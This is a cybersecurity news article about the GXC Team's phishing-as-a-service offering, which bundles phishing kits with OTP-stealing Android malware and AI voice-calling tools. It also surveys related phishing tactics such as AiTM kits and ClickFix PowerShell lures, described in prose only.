AI-Driven Cybercrime Service Merges Phishing Kits with Malicious Android Apps

  • GXC Team, a Spanish-speaking cybercriminal group, has advanced malware-as-a-service (MaaS) by combining phishing kits with malicious Android apps.
  • The phishing kits are priced between $150 and $900 per month; the full bundle, including Android malware, is available for around $500 per month.
  • The campaign targets Spanish financial institutions, tax and government services, e-commerce, banks, and cryptocurrency exchanges in various countries, with 288 phishing domains identified.
  • The GXC Team offers additional services including stolen banking credentials and custom coding-for-hire for other cybercriminal groups.
  • The team has integrated an SMS OTP stealer into their malware, capturing and forwarding one-time passwords to a Telegram bot.
  • AI-powered voice calling tools are also promoted, generating voice calls that mimic bank representatives to trick victims into providing sensitive information or performing actions.
  • AI voice cloning technology enhances the authenticity of phishing schemes, allowing attackers to impersonate trusted individuals.
  • Phishing kits with adversary-in-the-middle (AiTM) capabilities are popular for scaling phishing operations with lower technical barriers.
  • Researcher mr.d0x has highlighted the use of progressive web apps (PWAs) for creating convincing phishing pages with fake URL bars.
  • Phishing campaigns are evolving to use encoded URLs and unconventional social engineering tactics, such as obfuscated code execution in PowerShell.

Main AI News:

A Spanish-speaking cybercriminal organization, known as GXC Team, has recently advanced malware-as-a-service (MaaS) by integrating phishing kits with malicious Android applications. According to Group-IB, a Singaporean cybersecurity firm tracking this e-crime entity since January 2023, the GXC Team’s operation represents a “sophisticated AI-powered phishing-as-a-service platform.” This platform targets users across over 36 Spanish banks, various governmental bodies, and 30 institutions worldwide.

The phishing kits offered by GXC Team are priced between $150 and $900 per month. However, the complete package, which includes both the phishing kit and malicious Android malware, is available on a subscription basis for approximately $500 per month. The scope of their targets encompasses Spanish financial institutions, tax and governmental services, e-commerce platforms, banks, and cryptocurrency exchanges in the United States, the United Kingdom, Slovakia, and Brazil. To date, researchers have identified around 288 phishing domains associated with this operation.

In addition to selling phishing kits, the GXC Team also engages in the sale of stolen banking credentials and offers custom coding-for-hire services to other cybercriminal groups targeting financial institutions and cryptocurrency businesses. Security researchers Anton Ushakov and Martijn van den Berk noted that the GXC Team has innovated beyond traditional phishing methods by incorporating an SMS OTP stealer into their malware. This malicious Android app, disguised as a legitimate banking application, requests permissions to become the default SMS application on the victim’s device, allowing it to intercept and exfiltrate one-time passwords (OTPs) and other sensitive messages to a Telegram bot controlled by the attackers.

Once installed, the app opens a genuine bank’s website within a WebView, enabling users to interact with the site normally. However, the app silently captures and forwards OTP codes to the attackers whenever an OTP prompt is triggered. This sophisticated approach marks a significant evolution in phishing tactics.

The GXC Team also promotes AI-powered voice calling tools via a dedicated Telegram channel. These tools allow cybercriminals to generate voice calls to potential victims based on specific prompts directly from the phishing kit. The calls are designed to appear as though they come from banks, urging recipients to provide their two-factor authentication (2FA) codes, install malicious apps, or perform other actions. This tactic enhances the deception of their scams and underscores the rapid integration of AI technologies into cybercrime.

Recent reports from Google-owned Mandiant emphasize the potential of AI-powered voice cloning to mimic human speech with “uncanny precision.” This capability facilitates more authentic-sounding phishing (or vishing) schemes, which can be used to gain initial access, escalate privileges, and move laterally within target systems. Such voice impersonation can deceive victims into disclosing confidential information, granting remote access, or transferring funds, exploiting the inherent trust associated with familiar voices.

Phishing kits equipped with adversary-in-the-middle (AiTM) capabilities are becoming increasingly popular as they reduce the technical barriers to executing large-scale phishing campaigns. Researcher mr.d0x has highlighted how progressive web apps (PWAs) can be leveraged to design convincing phishing login pages. By manipulating the user interface to display a fake URL bar, these kits deceive users into entering their credentials on fraudulent sites. AiTM phishing kits can also exploit fallback authentication methods on services that use passkeys, taking advantage of less secure authentication methods that remain available.

The evolving tactics of phishing campaigns include embedding URLs encoded using security tools such as Secure Email Gateways (SEGs) to obscure phishing links and evade detection. Social engineering attacks have also introduced unconventional methods, where users are lured to seemingly legitimate but compromised websites and then prompted to manually copy, paste, and execute obfuscated code in a PowerShell terminal under the pretense of resolving browser display issues. Researchers Yashvi Shah and Vignesh Dhatchanamoorthy from McAfee Labs, tracking this activity under the moniker ClickFix, have documented these methods, noting that attackers use Base64-encoded scripts within legitimate error messages to execute malicious PowerShell commands. These commands typically download and execute payloads, such as HTA files, from remote servers, subsequently deploying malware like DarkGate and Lumma Stealer.

Conclusion:

The integration of advanced AI technologies into phishing and malware services by the GXC Team signifies a significant shift in the sophistication of cybercrime. The use of AI for creating more convincing phishing schemes and malware reflects an alarming trend towards highly effective, scalable attacks. This evolution in cybercrime necessitates enhanced cybersecurity measures and sophisticated detection methods to safeguard against increasingly advanced and deceptive tactics employed by cybercriminals. The market must adapt by investing in advanced security technologies and strategies to combat these emerging threats effectively.

Source